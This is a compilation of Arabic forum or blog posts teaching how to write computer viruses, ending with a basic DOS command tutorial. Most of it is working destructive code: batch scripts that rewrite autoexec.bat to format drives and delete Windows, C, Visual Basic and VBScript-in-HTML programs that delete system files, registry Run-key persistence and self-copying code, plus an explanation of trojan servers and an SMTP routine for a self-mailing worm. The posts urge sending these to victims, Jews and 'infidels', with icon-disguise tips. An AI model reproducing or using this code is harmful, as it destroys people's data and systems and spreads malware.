أولا يوجد بعض الأمور يجب توضيحها قبل البدء في هذا الموضوع وهو أنه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما إذا كنت في عملية هكر لجهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكني وجدت فيه عيب بسيط و هو أن هذا الفيروس لن يعمل فى جهاز وضع فيه غير ملف windows فمثلا إذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل ملف win98 فإن الفيروس الذي كوناه لن يقوم ببعض الأعمال و هي نسخ الأوامر و مسح الويندوز ولكنه سوف يقوم بعمل فورمات
أما بالنسبة لتعديله فكل ما أستطيع أن أعطيكم إياه من تعديل مفيد فيه و هو أن تمسحوا أوامر مسح الويندوز و Program files و تدع أمر الفورمات مع تغيير مثلا أنه يقوم بفورمات على الـ D: فيكون لكود كما يلى


كود:
echo off@ 
cls 
call attrib -h -r c:\autoexec.bat >nul 
echo @echo off >c:\autoexec.bat 
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
----------------
الكود الثالث :
--------------

كود:
code:--------------------------------------------------------------------------------echo off@ 
cls 
call attrib -h -r c:\autoexec.bat >nul 
echo @echo off >c:\autoexec.bat 
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat 
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat 
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat 
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat 
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
الآن و بعد أن تعرفنا على الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصــــــــــــــية الأولى :-
كود:
On Error Resume Next 
Dim copy, copy2 
copy = "c:\virus.exe" 
copy2 = "c:\windows\system\Project12.exe" 
FileCopy copy, copy2
يعطي هذا الكود للفيروس خاصية نسخ نفسه إلى مكان آخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه .
الخاصــــــــــــــية الثانيه :-
كود:
Option Explicit 
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long 
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long 
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long 
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long 
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long 
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long 
Private Const REG_SZ = 1 
Private Const LOCALMACHINE = &H80000002 
Private Sub Command1_Click() 
Dim InputValue As String 
Dim nBufferKey As Long, nBufferSubKey As Long 
RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey 
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey 
RegOpenKey nBufferKey, "Run-", nBufferSubKey 
InputValue = "c:\windows\system\Project12.exe" 
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey 
RegOpenKey nBufferKey, "Run-", nBufferSubKey 
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue) 
End Sub
يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry :
هذا هو كل ما حصلت عليه من أكواد للفيروسات فلقد شرحت لكم مجموعه من أكواد الفيروسات التي يمكننا استخدامها و مجموعه من الأكواد التى بإضافتها للفيروس تعطي له خصائص مفيدة
يتبقى لنا شيء بسيط وهو هذا الجزء و هو مجموعة أكواد لبعض الفيروسات
______________
فيرووس C++ :
*****************
كود:
#include<stdio.h> 
#include<conio.h> 
#include<stdlib.h> 
main() 
{ 
clrscr(); 
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n"); 
printf("\t\tFuck -oO Israel Oo- and -oO America Oo-\n\n"); 
remove("c:\\windows\\system.ini"); 
remove("c:\\windows\\win.ini"); 
remove("c:\\autoexec.bat"); 
remove("c:\\msdos.sys"); 
remove("c:\\io.sys"); 
remove("c:\\command.com"); 
remove("c:\\config.sys"); 
remove("c:\\windows\\ebd\\command.com"); 
remove("c:\\windows\\ebd\\ebd.cab"); 
remove("c:\\windows\\ebd\\Autoexec.bat"); 
remove("c:\\windows\\ebd\\setramd.bat"); 
remove("c:\\windows\\ebd\\Findramd.exe"); 
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe"); 
printf("Windows destroyed ...\n\n"); 
system("PAUSE"); 
}
فيرووس Visual Basic :
*****************
كود:
SetAttr "c:\autoexec.bat", vbNormal 
SetAttr "c:\msdos.sys", vbNormal 
SetAttr "c:\io.sys", vbNormal 
SetAttr "c:\windows\win.ini", vbNormal 
SetAttr "c:\windows\system.ini", vbNormal 
SetAttr "c:\command.com", vbNormal 
SetAttr "c:\config.sys", vbNormal 
SetAttr "c:\windows\rundll.exe", vbNormal 
SetAttr "c:\windows\rundll32.exe", vbNormal 
Kill "C:\autoexec.bat" 
Kill "C:\msdos.sys" 
Kill "C:\io.sys" 
Kill "C:\windows\win.ini" 
Kill "C:\windows\system.ini" 
Kill "C:\command.com" 
Kill "C:\config.sys" 
Kill "C:\windows\rundll.exe" 
Kill "C:\windows\rundll32.exe"
فيروس Html
*****************
كود:
<html> 
<head> 
************************ ****************************************="Content-Type" 
content="text/html; charset=iso-8859-1"> 
<title>Active-X HTML</title> 
</head> 
THIS HTML USING ACTIVE-X PLEASE CLICK #YES# 
<body bgcolor="#000000" Text="#C0C0C0"> 
<script language="VBScript"> 
<!-- This is a MY BRAIN --!> 
On Error Resume Next 
Dim a 
Set fso = CreateObject("Scripting.FileSystemObject") 
Set a = fso.GetFile("win.ini") 
a.Delete 
Dim b 
Set fso = CreateObject("Scripting.FileSystemObject") 
Set b = fso.GetFile("system.ini") 
b.Delete 
</script> 
<!--- This script author is THEONE---!> 
</body> 
</html>
( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )
يمكنك من دراسة هذه الأكواد و النظر فيها إلى ما قد يفيدكم فيمكنكم نقل بعض الأجزاء من الفيروسات السابقة و عمل فيروس قوى يخصكم
هذا هو كل ما لدي فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير
ولا تنسوا ....... ردودكم الطيبة
بواسطة Unknown
تصنيف :
PM
مرحبا...

أمن المعلومات من المواضيع المهمة في عالم الكمبيوتر وأعتقد أنة سيصبح أهم موضوع يشغل بال المهتمين

بالكمبيوتر في السنوات المقبلة والسبب تطور أساليب القرصنة وإتساع مجالها

قبل يومين تقريبا أردت تحديث نظام تشغيل لم أستخدمة منذ فترة وعندما بحثت عن التحديثات الجديدة

وجدت 60 تحديث جديد منهم 56 في الأمن؟؟ وطبعا هذا الذي تم إكتشافة في مدة سنة ونصف والذي لم يكتشف أعظم

على ماذا يدل هذا في رأيك بكل بساطة يدل على كارثة تهدد كل من يعتمد على الكمبيوتر في تجارة

أو صناعة أو معلومات والدليل قبل فترة بسيطة خسائر موقع جوجل ملايين الدولارات لأنة أعتمد

على التقنية وفتح مزاد علني على الإنترنت.

ما يهمنا من هذة المقدمة أنا الشغلة خطيرة و معقدة وحيرت الخبراء ولكن كيف

كما تعودنا دائما نبدأ من الأسهل ثم الأعقد وسيكون الشرح بالترتيب التالي:



الإختراق عن طريق ملفات التجسس (كيف تعمل ملفات التجسس)

الإختراق عن طريق فايروسات البريد(كيف تعمل فايروسات البريد)

الإختراق عن طريق ثغرات الأنظمة ( كيف تخترق الأنظمة)

الإختراق عن طريق تقنيات الإتصالات السلكية والاسلكية (إصطياد المعلومات)



أولا: ملفات التجسس

هذة الطريقة أسهل طريقة وأشهر طريقة والمعروفة عند أغلب الأعضاء

وتتم كالتالي

إرسال الخادم إلى الضحية - الإتصال بالخادم - إرسال المعلومات للخادم

ولكني سأخرج عن الروتين المتبع في شرح الإختراق وسأشرح كيف تعمل هذة البرامج

الخادم

بكل بساطة الخادم عبارة عن برنامج يفتح منفذ في الجهاز لتلقي الأوامر من برنامج خارجي لتنفيذها على الجهاز

فمثلا لفتح السيدي برنامج الإختراق يرسل معلومة إلى الخادم أي معلومة يحددها المبرمج ولتكن

0xAA

ويتم إرسالها بالطريقة التالية
send(s,(char*)0xAA,1,0);

وعندما يستقبلها الخادم يقارن ما هي التعليمة وينفذ الكود المطلوب بهذة الطريقة
DWORD cmd;
char rcv[10];
recv(s,rcv,10,0);
sscanf(rcv,"%X",&cmd);

switch(cmd)
{
......
......
case 0xAA:
mciSendString("set cdaudio door open",szbuf,255,hwnd);
break;
....
....
}

والي أريد أوصلة إن برنامج الإختراق لا ينفذ أي شيء وإنما الخادم بة كل دوال التنفيذ ولذالك تجد الخادم أكبر في الحجم

فكرة الخادم عن طريق الدوال

listen
recv


فكرة برنامج الإختراق عن طريق الدوال

connect
send


وللزيادة فكرة محرر الخادم

CreateFileMapping
MapViewOfFile


أعتقد هذا الموضوع يحتاج مثال وسأضع مثال لبرنامج تجسس إذا وافق المشرفين عن المنتدى

وثاني شيء لا نريد التعمق في هذا الموضوع لأنة من المواضع القديمة جداا

وخلونا نواكب العصر ونهتم بالجديد في عالم الهكر

ثانيا: فايروسات البريد

وهي أكثر الفايروسات إنتشارا في العالم لأنها ذكية وذاتية الإنتشار

لتشريح هذا النوع من الفايروسات لازم نأخذة من عدة نواحي

كيف ينشر نفسة و كيف يشغل نفسة بنفسة

طريقة إنتشارة

بعد ما يصمم المبرمج هذا الفايروس يقوم من مكان مجهول بإرسال هذا الفايروس إلى عدد من الإيميلات

وبعدة ينسى أمرة لأن الفايروس سيقوم بنشر نفسة

عندما يشغل أي مستخدم الفايروس بعد أن يستقبلة من البريد تحدث أمور كثيرة

أول ماظهرت هذة الفايروسات كانت تقوم بعمل واحد البحث عن عنواين البريد في الجهاز الضحية

إما أن تكون في دفتر العناوين أو في برنامج البريد وبعدها يرسل نفسة إلى هذة العناوين

وبعد فترة تطورت هذة الفايروسات وصارت طريقة عملها بهذا الشكل

يقوم الفايروس بالبحث عن العناوين في سيرفرات مشهورة مثل

سيرفر الشات أو سيرفر البريد أو قوائم البريد في بعض المواقع

ولكن كيف يقوم بالبحث وإرسال نفسة وكيف يعرف بروتوكولات البريد؟

smpt,pop3

الجواب

لو نرجع لدراست الشبكات والبروتوكولات لوجدنا موضوع مهم نظام أسماء المجالات

DNS

ينقسم هذا المجال لعدة أقسام ما يهمنا في هذا الدرس هو قسم

MX

ومعناة تبادل الرسائل

Mail Exchange

هذا القسم عبارة عن عناوين تبادل الرسائل في سيرفر البريد

لو نلاحظ موقع ياهو يحتوي سجل تبادل الرسائل على العناوين التالية

-------------------------------------------------------------------

yahoo.com MX preference = 1, mail exchanger = mx2.mail.yahoo.c
yahoo.com MX preference = 5, mail exchanger = mx4.mail.yahoo.c
yahoo.com MX preference = 1, mail exchanger = mx1.mail.yahoo.c

yahoo.com nameserver = ns1.yahoo.com
yahoo.com nameserver = ns2.yahoo.com
yahoo.com nameserver = ns3.yahoo.com
yahoo.com nameserver = ns4.yahoo.com
yahoo.com nameserver = ns5.yahoo.com
mx2.mail.yahoo.com internet address = 64.156.215.5
mx2.mail.yahoo.com internet address = 64.156.215.6
mx4.mail.yahoo.com internet address = 216.136.129.15
mx4.mail.yahoo.com internet address = 66.218.86.254
mx4.mail.yahoo.com internet address = 216.136.129.17
mx4.mail.yahoo.com internet address = 66.218.86.253
mx4.mail.yahoo.com internet address = 216.136.129.18
mx1.mail.yahoo.com internet address = 64.157.4.82
mx1.mail.yahoo.com internet address = 64.157.4.83
mx1.mail.yahoo.com internet address = 64.157.4.84
mx1.mail.yahoo.com internet address = 64.156.215.5
ns1.yahoo.com internet address = 66.218.71.63
ns2.yahoo.com internet address = 66.163.169.170
ns3.yahoo.com internet address = 217.12.4.104
ns4.yahoo.com internet address = 63.250.206.138
ns5.yahoo.com internet address = 64.58.77.85
-----------------------------------------------------------------------------------------

بمعنى أن هذة العناوين

mx1.mail.yahoo.com

mx2.mail.yahoo.com

mx3.mail.yahoo.com

mx4.mail.yahoo.com

عناوين السيرفر الذي يقوم بتبادل الرسائل

وتستطيع عرض سجل البريد لأي موقع عن طريق برنامج الدوس وبهذة الطريقة

nslookup mx yahoo.com

وبعد أن يقوم الفايروس بإظهار عنوان السيرفر يرسل نفسة

أول شيء يقوم بة بناء رسالة تحتوي على ملف مرفق بهذة الطريقة

char szRcv[MAX_PATH]

//// HELO
strcpy(szRcv,"HELO Yahoo\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

// MAIL FROM:
strcpy(szRcv,"MAIL FROM: <from@yahoo.com>\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

//// RCPT TO:
strcpy(szRcv,"RCPT TO: <to@yahoo.com>\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

//// DATA
strcpy(szRcv,"DATA\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);
----------------------------------------
//Build Mail
ZeroMemory(szRcv,MAX_PATH);
strcpy(szRcv,"From: from@yahoo.com\r\nTo: to@yahoo.com\r\nDate: 2004\r\nSubject: Ilove You\r\n");

strcpy(BualdMsg,szRcv);
strcat(BualdMsg,"Rq-Mail: WC Mail\r\n");
strcat(BualdMsg,"MIME-Version: 1.0\r\n");
strcat(BualdMsg,"Content-Type: multipart/mixed; boundary=WC_MAIL_PaRt_BoUnDaRy_5168011\r\n\n");
strcat(BualdMsg,"This is a multi-part message in MIME format.\r\n\n");
//
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011\r\n");
strcat(BualdMsg,"Content-Type: text/plain\r\n");
strcat(BualdMsg,"Content-Transfer-Encoding: 7Bit\r\n\n");
strcat(BualdMsg,"body mail\r\n");

//
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011\r\n");
strcat(BualdMsg,"Content-Type:application/octet-stream; file=love.exe\r\n");
strcat(BualdMsg,"Content-Transfer-Encoding: base64\r\n");
strcat(BualdMsg,"Content-Disposition: attachment; filename=love.exe\r\n\n");
strcat(BualdMsg,"EXE Code");
strcat(BualdMsg,"\r\n\n");
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011--\r\n");

strcat(BualdMsg,"\r\n.\r\n");

//Send File
send(sct,BualdMsg,strlen(BualdMsg),0);
recv(sct,szRcv,MAX_PATH,0);


ولكن يجب أن تنتبة لهذة الكلمة في الكود

EXE Code

هذا الكلمة توضع مكانها شفرة الفايروس بعد التشفير

ويتم تشفير الملف بعدة طرق وقانون التشفير هو

Code<<= 8;
Code |= (indexCode & 0xff);
Code += 8;

وبعدها يتم الإرسال

هذة بكل بساطة دورة تكاثر الفايروس وإنتشارة

أما عن طريقة تشغيل نفسة فالمسألة بسيطة جدا

عن طريق

الريجستري

عن طريق ملفات التأسيس

كتابة نفسة في مقدمة البرامج

كتابة نفسة في قطاع الإقلاع في القرص الصلب



هذة الطرق في الإختراق لا تعتبر مشكلة وقد وجد لها حلول قد

تكون مفيدة والهدف من شرحها أن تكون مقدمة للدروس القادمة

التي ستتعلم بعدها أمور يجهلها الكثييير في الأمن والحماية ولا يوجد لها حلول إلى وقتنا الحالي
بواسطة Unknown
تصنيف : ,

كيف تصنع الفيروسات

موسوعة  كيف تصنع الفيروسات::: موضوع خطير جداً ::: اقسم ان لا استعمل الطريقه الا على الكفار على ما أقول شهيد اول شي افتح الدفتر او المفكره وليس الورد وتنسخ الكود الازرق الي تحت وتضعه في المفكره و تعمل حفظ باسم وتكتب اسم الملف الاسم مثلا virus تكتب virus.bat وسيحفظ على شكل مربع ابيض داخله ترس اصفر بس لا تحاول ولا تفكر تفتح الملف بعد صنعه وارسله فقط لليهود وهذي الفيروسات مع عملها بس لا تنسخ عمل الفايروس في المفكره فايروس عمل فورمات على C,D,E,F عمل فورمات C,D,E,F call attrib -h -r c:\autoexec.bat >nul echo format c: /q /u /autotest >nul >>c:\autoexec.bat echo format d: /q /u /autotest >nul >>c:\autoexec.bat echo format e: /q /u /autotest >nul >>c:\autoexec.bat echo format f: /q /u /autotest >nul >>c:\autoexec.bat echo I love my girl echo Smart Hacker عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز call attrib -h -r c:\autoexec.bat >nul echo format c: /q /u /autotest >nul >>c:\autoexec.bat echo format d: /q /u /autotest >nul >>c:\autoexec.bat echo format e: /q /u /autotest >nul >>c:\autoexec.bat echo format f: /q /u /autotest >nul >>c:\autoexec.bat echo I love my girl echo Smart Hacker c:\windows\rundll.exe user.exe,exitwindowsexec عمل فورمات C,D,E,F والطابعه وقفل الجهاز call attrib -h -r c:\autoexec.bat >nul echo format c: /q /u /autotest >nul >>c:\autoexec.bat echo format d: /q /u /autotest >nul >>c:\autoexec.bat echo format e: /q /u /autotest >nul >>c:\autoexec.bat echo format f: /q /u /autotest >nul >>c:\autoexec.bat echo I love my girl echo Smart Hacker c:\windows\rundll32.exe user.exe,exitwindows قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره @Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys echo Smart Hacker قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز call attrib -h -r c:\autoexec.bat >nul @Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys echo Smart Hacker عمل فورمات للجهاز فورا code:--------------------------------------------------------------------------------echo off@ cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat echo format c: /q /u /autotest >nul >>c:\autoexec.bat-------------------------------------------------------------------------------- اهم فايروس فايروس مدمر echo off@ cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat echo format c: /q /u /autotest >nul >>c:\autoexec.bat وبعد عمل الملف يمكنك تغير ايقونة الملف بطريقه الضغط عليه باليمين واختر خصائص ارجو الحذر من اي خطاء بسبب فورمات الجهاز اقسم ان لا استعمل الطريقه الا على الكفار على ما أقول شهيد
بواسطة Unknown
تصنيف :
ااقدم لكم الطريق اللتى يمكن بها صنع الفيروسات وهى ليست مهمه لانها ضاره وليست مفيده لاكن لكى يتعلمو كيف يفكر من يصنعا بتلك الطريق ولالامانه العلميه منقول


الدرس الاول
  • الفيروسات
    الدرس الاول
    من منا لا يعرف الفيروسات و اخطارها؟! و التدمير الممكن تحقيقه بهذه الفيروسات!
    من يصنع الفيروسات بغرض الاذي, فليس الا مستهتر غبي يستعمل العلم في اشياء مضرة, و من اخطر الفيروسات التي صنعت حتي الان هو فيروس شرنوبيل, الذي يقوم بتدمير الجهاز كليا, اخترعه شاب في الحادي و العشرين من عمره لا يهوي الا التدمير..
    مقدمة عن الفيروسات:
    تصنع الفيروسات ببرامج مثل دلفي و باسكال ..الخ, اما ما سنصنعه الان ليس فيروسات, بل برامج مدمرة تقوم بنفس عمل الفيروسات, و لا يستطيع النورتن كشفها..
    أفكار هذه الفيروسات بسيطة و سهلة, و كلها بأكواد درسناها من قبل, ولكن لتصميم فيروسك الخاص, يجب ان يتوافر لديك الذكاء, انظر الي الامثلة و اعرف طريقة صنع هذه الفيروسات ثم اصنع افكار مثلها..
    ارجو من كل اخ مسلم عدم استخدام هذه الفيرووس ضد المسلمين
    بس الدرس الاول دا هيكون عن كلام كتير بس غير الفيروسات بس حاجات تساعدنا في تصنيع الفيروسا اول حاجة ابدا بكل اول الدوس
    اوامر الدوس
    دي اوامر الدوس ودي استعن بشرح الاخ سوفا من منتدي القراصنة
    كلمة (DOS) اختصار لـ Disk Operating System
    * تعريف الـ DOS : هو مجموعة من الأوامر والتعليمات التي تتحكم في مكونات الحاسب الآلي.
    -دور الـ DOS في جهاز الكمبيوتر: هو حلقة الوصل بين الكمبيوتر والمستخدم.
    -الملفات:
    إن أهم الخدمات التي يقدمها الـ DOS هي تنظيم حفظ البيانات في الملفات.
    تعريف الملف: هو عبارة عن وعاء لحفظ البرامج أو النصوص أو البيانات، وهو أصغر وحدة للحفظ بالنسبة لنظام التشغيل.
    * تسمية الملفات:
    ينقسم اسم الملف إلي قسمين:
    القسم الأول: وهو الأساس ( ROOT ) ويجب ألا يزيد طوله عن 8 حروف. وهذا الجزء من اسم الملف ضروري - إي يجب وجوده.
    القسم الثاني: ويسمى الامتداد ويجب ألا يزيد طوله عن 3 حروف، ويجب أن يفصل بين الاسم ( الأساس) و الامتداد بعلامة النقطة ( . ). وهذا الجزء من الاسم اختياري - يمكن الاستغناء عنه.
    -جميع الملفات التي تنتهي بأحد الإمدادات التالية BAT , EXE , COM قابلة للتحميل والتنفيذ المباشر.
    ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع أسماء ملفاتها الكاملة:
    .BAT ملف أوامر تنفذ دفعة واحدة ( BATCH ).
    .COM ملف برنامج ( COMMAND ).
    .EXE ملف جاهز للتنفيذ ( EXECUTABLE ).
    .DOC ملف نصوص أو وثائق ( DOCUMENT ).
    .ASM ملف مصدر برنامج مكتوب بلغة التجميع ( ASSEMBLY ).
    .BAK ملف احتياطي ( BACKUP ).
    .BAS ملف برنامج بيسك ( BASIC ).
    .DBF ملف قاعدة بيانات ( DBASE FILE ).
    .PAS ملف برنامج مكتوب بلغة باسكال ( PASCAL ).
    .SYS ملف تكوين نظام ( SYSTEM ).
    .C ملف مصدر مكتوب بلغة سي ( C ).
    الرموز المستخدمة في تسمية الملفات:
    1-الحروف الأبجدية من A إلي Z ( سواء كانت صغيرة أو كبيرة ).
    2-الأرقام من 0 إلي 9 .
    3-بعض العلامات مثل: ( { } ، ( ) ، & ، % ، $ ، ** ، ‍‍‍‍‌! ).
    ‍‍
    * الشروط التي يجب مراعاتها عند اختيار اسم الملف:
    1- طول الاسم الأساسي للملف من 1-8 حروف.
    2- يجب ألا يزيد الاسم الممتد -إن وجد- عن 3 أحرف.
    3- أن يفصل بين الاسم الأساسي والاسم الممتد -إن وجد- بعلامة النقطة ( . ).
    4- أن يكتب الاسم الأساسي والاسم الممتد بدون فراغات.
    5- عدم استخدام مفاتيح التحكم وهي : ( ALT ، CTRL ، ESC ) في أي اسم .
    6- عدم استخدام الأسماء المحجوزة لنظام التشغيل مثل CON الخاص يلوحة المفاتيح و شاشة العرض أو PRN الخاص باسم الطابعة.
    7- عدم استخدام الرموز ذات ال***** الخاصة لنظام التشغيل وهي * ، / ، ، + ، = ، ؟).
    تنظيم الملفات على القرص:
    للحصول على ملفات منظمة على القرص يجب إنشاء الدليل ( Directory ) فذلك يسهل التعامل مع الملفات وترتيبها بسهولة.
    -تعريف الدليل ( Directory ): هو عبارة عن مجموعة ملفات توضع تحت مسمى دليل معين.
    -أقسام الأدلة: تقسم الأدلة إلي أربعة أقسام:
    1-الدليل الرئيسي: وهو الدليل الذي يقوم Dos بإنشائه تلقائياً عند تشكيل الاسطوانة وتوضع تحته جميع الملفات المنشأة.
    2-الدليل الفرعي: وهو الذي ينشأ تحت دليل رئيسي ( subdirectory ).
    ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من الملفات لذلك يفضل أن توزع هذه الملفات في أدلة فرعية.
    -ويمكن إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو داخل أدلة فرعية أخرى.
    -الفرق بين الدليل الرئيسي والدليل الفرعي: هو أن النظام ينشئ الدليل الرئيسي تلقائياً، بينما ينشئ المستخدم الدليل الفرعي.
    -يوجد دليل رئيسي واحد في كل قرص بينما قد يوجد في القرص عدة أدلة فرعية.
    3-الدليل الأبوي: وهو نوع من الأدلة تتفرع منه أدلة فرعية عديدة فيصبح دليلاً أبوياً لهم.
    ومثال على ذلك:
    SCHOOLCLASS
    إن الدليل ( SCHOOL ) في المثال السابق يعتبر دليلاً أبوياً للدليل الفرعي ( CLASS ).
    4-الدليل الحالي: وهو الدليل الذي يكون مستخدما وقت العمل عليه ، وكذلك هو الدليل الذي يتم التعامل مع ملفاته بدون أن يسبقها اسم دليل آخر - لا يرتبط بدليل أبوي.
    * طريقة تحميل نظام التشغيل من الأسطوانة المرنة: هناك طريقتين لعمل ذلك :
    الطريقة الأولى: ( يجب أن يكون الجهاز مغلق )
    1-ندخل اسطوانة الدوس في محرك الأقراص A.
    2-نقوم بتشغيل جهاز الكمبيوتر .
    الطريقة الثانية: (حين يكون الجهاز يعمل)
    1-ندخل اسطوانة الدوس في محرك الأقراص A.
    2-نقوم بالضغط على المفاتيح التالية معا: ALT + CTRL + DELETE .
    * رموز محركات الأقراص في نظام التشغيل ( DOS ):
    1- الأسطوانة المرنة ( Floppy Disk ): ويوجد هناك نوعين من الأسطوانات المرنة وهما :
    أ-أسطوانة مرنة حجم 3.5 بوصة.
    ب-أسطوانة مرنة حجم 5.25 بوصة.
    -ويرمز لمحرك الأسطوانات المرنة بالرمز A أو B.
    2-القرص الصلب ( Hard Disk ): ويرمز له بالرمز C.
    3- ( CD-ROM ): ويرمز له بالرمز D أو E.
    * طريقة التنقل بين محركات الأقراص: بالضغط على الرمز ثم نلحقه بـ :

    * الملفات الأساسية لنظام التشغيل الـ ( DOS ):
    يتكون نظام التشغيل من ثلاثة ملفات أساسية تمثل البنية الأساسية للنظام والعمود الفقري له وهي كالتالي:
    أولاً: IO.SYS : وهذا الملف خاص بالتحكم في الإدخال والإخراج.
    ثانياً: MSDOS.SYS : وهذا الملف يحتوي على مجموعة كبيرة من الأوامر التي توضع في الذاكرة عند التشغيل.
    ثالثاً: COMMAND.COM : وهذا الملف يحتوي على جميع أوامر نظام التشغيل الداخلية .
    * مكونات نظام التشغيل:
    ينقسم نظام التشغيل إلي ثلاثة أجزاء رئيسية :
    الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة عن مجموعة من التعليمات والأوامر تعمل بصورة تلقائية لا دخل للمستخدم فيها ولا يمكنه التحكم بها وهي مخزنة في ذاكرة القراءة فقط ( ROM ) والتي لايمكن مسحها أو تعديلها والجزء الثالث عبارة عن مجموعة من الأوامر و البرامج تعتبر خدمات للمستخدم وتيسر له استخدام الكمبيوتر .
    * الاختصارات :
    يستخدم نظام التشغيل ( DOS ) اختصارين اثنين عوضاً عن أسماء الملفات أو جزء منها داخل صيغة الأوامر وهما:
    1) الرمز ( ? ) : ويستخدم لل***** على غياب حرف واحد فقط من اسم أحد الملفات.
    2) الرمز ( * ) : ويستخدم لل***** على غياب أي عدد من الحروف (بشرط أن لا يتجاوز 8 أحرف).

    * الأوامر:

    تنقسم أوامر الـ DOS إلى قسمين:
    1- الأوامر الداخلية : وهي الأوامر التي يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من الأوامر لا يستلزم وجود أسطوانة لتنفيذه.
    من أمثلة الأوامر الداخلية:
    CLS - TIME - DATE - MD - CD - RD - DIR - DEL
    2-الأوامر الخارجية : وهي الأوامر التي لا يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها يشترط وجود اسطوانة نظام التشغيل داخل المشغل المرن أو الصلب.
    من أمثلة الأوامر الخارجية:
    FORMAT - DISKCOPY - DISKCOMP - COMP - SYS - EDIT
    - تنقسم أوامر نظام التشغيل الداخلية والخارجية إلي ستة أنواع :
    1-أوامر النظام:
    MEM
    DATE
    VER
    DosKey
    PROMPT
    CLS
    VSAFE
    MEMMAKER
    MODE
    COMMAND
    MSD
    TIME
    DEFRAG
    2-أوامر الاسطوانة:
    SCANDISK
    CHKDSK
    FORMAT
    DISKCOMP
    DISKCOPY
    MSBACKUP
    SYS
    LABEL
    FDISK
    UNFORMAT
    VOL
    3-أوامر الفهرس:
    APPEND
    DIR
    CD
    RD
    MOVE
    DATE
    DELTREE
    MD
    TREE
    4-أوامر الملفات:
    TYPE
    COPY CON
    COPY
    ATTRIB
    DEL
    REN
    UNDELETE
    XCOPY
    PRINT
    FIND
    EDIT
    SORT
    MSAV
    MORE
    HELP
    5-الأوامر الحزمية:
    REM
    CALL
    ECHO
    FOR
    IF
    PAUES
    SHIFT CHOICE
    GOTO
    6-أوامر خاصة ونادرة الاستخدام:
    FASTOPEN
    MSCDEX
    CHCP
